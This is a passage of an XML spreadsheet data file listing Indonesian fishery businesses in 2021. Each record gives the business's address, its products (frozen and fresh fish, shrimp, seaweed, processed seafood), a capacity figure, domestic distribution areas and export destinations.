    <s v="Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Lencam, Sebelah, Manyung, Kerapu, Layur, Kakap, Kuro)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="45000"/>
    <s v="Kota Jakarta Utara, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25615"/>
    <x v="1205"/>
    <s v="USAHA HASIL LAUT"/>
    <s v="Jl. Abraham O Atururi, Kel. Suprauw, Kec. Maladum Mes, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Lobster Hidup"/>
    <d v="2021-05-17T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Barat"/>
    <m/>
  </r>
  <r>
    <n v="25616"/>
    <x v="1206"/>
    <s v="CV. PANUN STAR"/>
    <s v="Jl. Cakalang Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Kepiting Hidup"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Hong Kong, Singapore, Thailand"/>
  </r>
  <r>
    <n v="25617"/>
    <x v="1207"/>
    <s v="PT. SORBY INTERNATIONAL MEDAN"/>
    <s v="Jl. Pulau Irian Kompleks Miel Nusantara I No. 3A KIM, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Tenggiri)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25618"/>
    <x v="1207"/>
    <s v="PT. SORBY INTERNATIONAL MEDAN"/>
    <s v="Jl. Pulau Irian Kompleks Miel Nusantara I No. 3A KIM, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Bawal Hitam, Kambing-kambing, Sebelah, Kerapu)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25619"/>
    <x v="1207"/>
    <s v="PT. SORBY INTERNATIONAL MEDAN"/>
    <s v="Jl. Pulau Irian Kompleks Miel Nusantara I No. 3A KIM, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Rajungan Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25620"/>
    <x v="1207"/>
    <s v="PT. SORBY INTERNATIONAL MEDAN"/>
    <s v="Jl. Pulau Irian Kompleks Miel Nusantara I No. 3A KIM, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25621"/>
    <x v="1207"/>
    <s v="PT. SORBY INTERNATIONAL MEDAN"/>
    <s v="Jl. Pulau Irian Kompleks Miel Nusantara I No. 3A KIM, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25622"/>
    <x v="1207"/>
    <s v="PT. SORBY INTERNATIONAL MEDAN"/>
    <s v="Jl. Pulau Irian Kompleks Miel Nusantara I No. 3A KIM, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25623"/>
    <x v="1207"/>
    <s v="PT. SORBY INTERNATIONAL MEDAN"/>
    <s v="Jl. Pulau Irian Kompleks Miel Nusantara I No. 3A KIM, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tuna Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25624"/>
    <x v="1207"/>
    <s v="PT. SORBY INTERNATIONAL MEDAN"/>
    <s v="Jl. Pulau Irian Kompleks Miel Nusantara I No. 3A KIM, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Air Tawar Beku (Lele, Gurame, Bandeng, Patin, Nila)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25630"/>
    <x v="1208"/>
    <s v="UD. BINTANG JAYA"/>
    <s v="Komplek Pergudangan Mutiara Margomulyo Indah Blok DC 1, Kel. Manukan Wetan, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="6000000"/>
    <m/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="25632"/>
    <x v="1209"/>
    <s v="CV. BINA USAHA"/>
    <s v="Jl. Panglima Minal RT 02 RW 02, Kel. Senggoro, Kec. Bengkalis, Kabupaten Bengkalis&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="864000"/>
    <m/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25633"/>
    <x v="1209"/>
    <s v="CV. BINA USAHA"/>
    <s v="Jl. Panglima Minal RT 02 RW 02, Kel. Senggoro, Kec. Bengkalis, Kabupaten Bengkalis&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Pelagis Segar (Tongkol, Sarden, Layang, Cakalang)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25634"/>
    <x v="1209"/>
    <s v="CV. BINA USAHA"/>
    <s v="Jl. Panglima Minal RT 02 RW 02, Kel. Senggoro, Kec. Bengkalis, Kabupaten Bengkalis&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Segar (Mata Besar, Swanggi, Sebelah, Senangin, Layur, Kakap, Kurau)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25635"/>
    <x v="1209"/>
    <s v="CV. BINA USAHA"/>
    <s v="Jl. Panglima Minal RT 02 RW 02, Kel. Senggoro, Kec. Bengkalis, Kabupaten Bengkalis&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Kerang Hidup"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25636"/>
    <x v="1209"/>
    <s v="CV. BINA USAHA"/>
    <s v="Jl. Panglima Minal RT 02 RW 02, Kel. Senggoro, Kec. Bengkalis, Kabupaten Bengkalis&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Kerang Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25637"/>
    <x v="1209"/>
    <s v="CV. BINA USAHA"/>
    <s v="Jl. Panglima Minal RT 02 RW 02, Kel. Senggoro, Kec. Bengkalis, Kabupaten Bengkalis&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Air Tawar Segar (Betutu, Nila)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="60000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25638"/>
    <x v="1210"/>
    <s v="CV. PURMAR ASEAN ABADI"/>
    <s v="Dusun Sidorukun RT 002 RW 001, Kel. Selo Retno, Kec. Sidomulyo, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-05-19T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="25640"/>
    <x v="1062"/>
    <s v="PT. MEGASETIA AGUNG KIMIA"/>
    <s v="Jl. Rorotan IV No.189 RT 004 RW 010, Kel. Rorotan, Kec. Cilincing, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Minyak Ikan"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Timur, Kabupaten Bogor, Kabupaten Bekasi, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="25643"/>
    <x v="1211"/>
    <s v="PT. LAUTAN PERSADA"/>
    <s v="Jl. Gabion Perikanan Perum Prasarana Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Cumi-cumi, Sotong, Gurita)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Sibolga, Kota Pematang Siantar, Kota Medan, Kota Padang, Kota Pekanbaru, Kota Palembang, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25644"/>
    <x v="1211"/>
    <s v="PT. LAUTAN PERSADA"/>
    <s v="Jl. Gabion Perikanan Perum Prasarana Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Kakatua, Gulama, Kambing-kambing, Sebelah, Kerapu, Layur, Merah)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="360000"/>
    <s v="Kabupaten Aceh Singkil, Kabupaten Deli Serdang, Kabupaten Batu Bara, Kota Sibolga, Kota Tanjung Balai, Kota Medan"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25645"/>
    <x v="1211"/>
    <s v="PT. LAUTAN PERSADA"/>
    <s v="Jl. Gabion Perikanan Perum Prasarana Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Kembung, Lemuru, Mata Besar, Tongkol, Salem)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="3600000"/>
    <s v="Kabupaten Batu Bara, Kota Sibolga, Kota Pematang Siantar, Kota Medan, Kota Padang, Kota Pekanbaru, Kota Jambi, Kota Palembang, Kota Jakarta Utara, Kota Pontianak"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25646"/>
    <x v="1211"/>
    <s v="PT. LAUTAN PERSADA"/>
    <s v="Jl. Gabion Perikanan Perum Prasarana Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="120000"/>
    <s v="Kabupaten Aceh Singkil, Kabupaten Deli Serdang, Kabupaten Batu Bara, Kota Medan"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25647"/>
    <x v="1211"/>
    <s v="PT. LAUTAN PERSADA"/>
    <s v="Jl. Gabion Perikanan Perum Prasarana Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Segar (Cumi-cumi, Sotong, Gurita)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="12000"/>
    <s v="Kabupaten Batu Bara, Kota Sibolga, Kota Tanjung Balai, Kota Medan"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25648"/>
    <x v="1211"/>
    <s v="PT. LAUTAN PERSADA"/>
    <s v="Jl. Gabion Perikanan Perum Prasarana Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Segar (Kakatua, Gulama, Kambing-kambing, Sebelah, Kerapu, Layur, Merah)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="12000"/>
    <s v="Kabupaten Batu Bara, Kota Sibolga, Kota Tanjung Balai, Kota Medan"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25649"/>
    <x v="1211"/>
    <s v="PT. LAUTAN PERSADA"/>
    <s v="Jl. Gabion Perikanan Perum Prasarana Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Segar (Kembung, Tongkol, Kuring, Salem, Selayang, Aso-aso, Tenggiri)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="12000"/>
    <s v="Kabupaten Batu Bara, Kota Sibolga, Kota Tanjung Balai, Kota Medan"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25650"/>
    <x v="1211"/>
    <s v="PT. LAUTAN PERSADA"/>
    <s v="Jl. Gabion Perikanan Perum Prasarana Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Segar"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="12000"/>
    <s v="Kabupaten Batu Bara, Kota Sibolga, Kota Tanjung Balai, Kota Medan"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25651"/>
    <x v="1161"/>
    <s v="PT, BUMI MENARA INTERNUSA"/>
    <s v="Jl, Kima 15 Kavling R No,4C, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Lencam, Biji Nangka, Kerapu, Malabar, Kakatua, Kakap)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="394608"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25652"/>
    <x v="1212"/>
    <s v="PT. PABRIK LAMONGAN BMI"/>
    <s v="Jl. Raya Lamongan - Gresik Km 40, Kel. Rejosari, Kec. Deket, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Kod, Kakap, Kerapu, Lencam, Kakaktua)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25653"/>
    <x v="1212"/>
    <s v="PT. PABRIK LAMONGAN BMI"/>
    <s v="Jl. Raya Lamongan - Gresik Km 40, Kel. Rejosari, Kec. Deket, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25654"/>
    <x v="1212"/>
    <s v="PT. PABRIK LAMONGAN BMI"/>
    <s v="Jl. Raya Lamongan - Gresik Km 40, Kel. Rejosari, Kec. Deket, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25655"/>
    <x v="1212"/>
    <s v="PT. PABRIK LAMONGAN BMI"/>
    <s v="Jl. Raya Lamongan - Gresik Km 40, Kel. Rejosari, Kec. Deket, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="6500"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25656"/>
    <x v="1212"/>
    <s v="PT. PABRIK LAMONGAN BMI"/>
    <s v="Jl. Raya Lamongan - Gresik Km 40, Kel. Rejosari, Kec. Deket, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="4500"/>
    <m/>
    <s v="China, United States"/>
  </r>
  <r>
    <n v="25657"/>
    <x v="1213"/>
    <s v="PT. KOMODITI NUSANTARA SEJAHTERA"/>
    <s v="Jl. Ps. Lelang Ikan Muara Baru No. 87 RT 20 RW 17 Pelabuhan Perikanan Samudera Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Salem)"/>
    <d v="2021-06-16T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Barat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="25660"/>
    <x v="1214"/>
    <s v="CV, SLAMET WIDODO"/>
    <s v="Jl, Kawasan Industri Terboyo Blok N1-H, Kel, Trimulyo, Kec, Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Terasi Udang"/>
    <d v="2021-06-23T00:00:00"/>
    <n v="2371369"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Saudi Arabia, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25661"/>
    <x v="1215"/>
    <s v="PT. AYU BUMI SEJATI"/>
    <s v="Jl. Medan Belawan KM. 17,5, Kel. Pekan Labuhan, Kec. Medan Labuhan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="25662"/>
    <x v="1215"/>
    <s v="PT. AYU BUMI SEJATI"/>
    <s v="Jl. Medan Belawan KM. 17,5, Kel. Pekan Labuhan, Kec. Medan Labuhan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Gulama, Biji Nangka, Kerapu, Layur, Kakap)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="25663"/>
    <x v="1215"/>
    <s v="PT. AYU BUMI SEJATI"/>
    <s v="Jl. Medan Belawan KM. 17,5, Kel. Pekan Labuhan, Kec. Medan Labuhan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Kembung)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="25664"/>
    <x v="1215"/>
    <s v="PT. AYU BUMI SEJATI"/>
    <s v="Jl. Medan Belawan KM. 17,5, Kel. Pekan Labuhan, Kec. Medan Labuhan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25665"/>
    <x v="1215"/>
    <s v="PT. AYU BUMI SEJATI"/>
    <s v="Jl. Medan Belawan KM. 17,5, Kel. Pekan Labuhan, Kec. Medan Labuhan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Rebus Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="25666"/>
    <x v="1215"/>
    <s v="PT. AYU BUMI SEJATI"/>
    <s v="Jl. Medan Belawan KM. 17,5, Kel. Pekan Labuhan, Kec. Medan Labuhan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="25667"/>
    <x v="1215"/>
    <s v="PT. AYU BUMI SEJATI"/>
    <s v="Jl. Medan Belawan KM. 17,5, Kel. Pekan Labuhan, Kec. Medan Labuhan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Paha Kodok Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="70000"/>
    <m/>
    <s v="Belgium, France"/>
  </r>
  <r>
    <n v="25668"/>
    <x v="1216"/>
    <s v="SYALOM PONGKOR"/>
    <s v="Desa Kolongan Jaga II No.44, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Nila Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Pusat, Kota Manado"/>
    <m/>
  </r>
  <r>
    <n v="25669"/>
    <x v="1216"/>
    <s v="SYALOM PONGKOR"/>
    <s v="Desa Kolongan Jaga II No.44, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Sambal Roa"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="60"/>
    <s v="Kota Jakarta Pusat, Kota Manado"/>
    <m/>
  </r>
  <r>
    <n v="25670"/>
    <x v="1216"/>
    <s v="SYALOM PONGKOR"/>
    <s v="Desa Kolongan Jaga II No.44, Kel. Kolongan Jaga II, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Abon Ikan"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="60"/>
    <s v="Kota Jakarta Pusat, Kota Manado"/>
    <m/>
  </r>
  <r>
    <n v="25671"/>
    <x v="1216"/>
    <s v="SYALOM PONGKOR"/>
    <s v="Desa Kolongan Jaga II No.44, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Masak Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="600"/>
    <s v="Kota Jakarta Pusat, Kota Manado"/>
    <m/>
  </r>
  <r>
    <n v="25673"/>
    <x v="84"/>
    <s v="PT. MUTIARA LAUT ABADI"/>
    <s v="Jl. Pulau Buton KIM II Mabar, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="5450000"/>
    <m/>
    <s v="Australia, Canada, France, Korea, Democratic People's Republic of, Thailand, United States"/>
  </r>
  <r>
    <n v="25677"/>
    <x v="1217"/>
    <s v="PT. SINAR MALALUGIS MAKMUR"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Muara Baru Ujung Blok K No.1-2, Kel. Penjaringan, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="25678"/>
    <x v="1218"/>
    <s v="PT. WINSON PRIMA SEJAHTERA"/>
    <s v="Jl. Pulau Solor No. 11 KIM-II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tuna Beku"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="720000"/>
    <m/>
    <s v="Canada, Philippines, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25679"/>
    <x v="1218"/>
    <s v="PT. WINSON PRIMA SEJAHTERA"/>
    <s v="Jl. Pulau Solor No. 11 KIM-II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Kuring, Todak)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25681"/>
    <x v="1219"/>
    <s v="NIO'S"/>
    <s v="Perumahan Bumi Kawangkoan Baru, Kel. Kawangkoan Baru Jaga XII, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Krispy Ikan"/>
    <d v="2021-06-09T00:00:00"/>
    <n v="122"/>
    <s v="Kota Jakarta Pusat, Kota Manado"/>
    <m/>
  </r>
  <r>
    <n v="25682"/>
    <x v="1219"/>
    <s v="NIO'S"/>
    <s v="Perumahan Bumi Kawangkoan Baru, Kel. Kawangkoan Baru Jaga XII, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Sambal Roa"/>
    <d v="2021-06-09T00:00:00"/>
    <n v="25"/>
    <s v="Kota Jakarta Pusat, Kota Manado"/>
    <m/>
  </r>
  <r>
    <n v="25683"/>
    <x v="1219"/>
    <s v="NIO'S"/>
    <s v="Perumahan Bumi Kawangkoan Baru, Kel. Kawangkoan Baru Jaga XII, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Sambal Tuna"/>
    <d v="2021-06-09T00:00:00"/>
    <n v="25"/>
    <s v="Kota Jakarta Pusat, Kota Manado"/>
    <m/>
  </r>
  <r>
    <n v="25684"/>
    <x v="1219"/>
    <s v="NIO'S"/>
    <s v="Perumahan Bumi Kawangkoan Baru, Kel. Kawangkoan Baru Jaga XII, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Abon Ikan"/>
    <d v="2021-06-09T00:00:00"/>
    <n v="25"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25687"/>
    <x v="1220"/>
    <s v="CV. JAYA RASA BENGKULU"/>
    <s v="Jl. DP. Negara Gg DP Negara III RT 29 RW 01 No.20, Kel. Sukarami, Kec. Selebar, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Kerupuk Tulang Tenggiri"/>
    <d v="2021-05-28T00:00:00"/>
    <n v="300"/>
    <s v="Kota Bengkulu"/>
    <m/>
  </r>
  <r>
    <n v="25688"/>
    <x v="1132"/>
    <s v="PT, INTIMAS SURYA"/>
    <s v="Jl, Muara Baru Ujung Blok E No,1, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso, Naget, Siomay, Roll Ikan, Keong Mas) "/>
    <d v="2021-05-21T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="25689"/>
    <x v="1221"/>
    <s v="PT. INDOMINA BAHARI SEJAHTERA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Blok M Kav. No. 9-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Barakuda, Bonito, Cobia, Julung-julung, Kembung, Lemadang)"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="800000"/>
    <m/>
    <s v="Japan, Malaysia, Singapore, Thailand, Ukraine, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25690"/>
    <x v="1221"/>
    <s v="PT. INDOMINA BAHARI SEJAHTERA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Blok M Kav. No. 9-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="Japan, Malaysia, Singapore, Thailand, Ukraine, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25691"/>
    <x v="1221"/>
    <s v="PT. INDOMINA BAHARI SEJAHTERA"/>
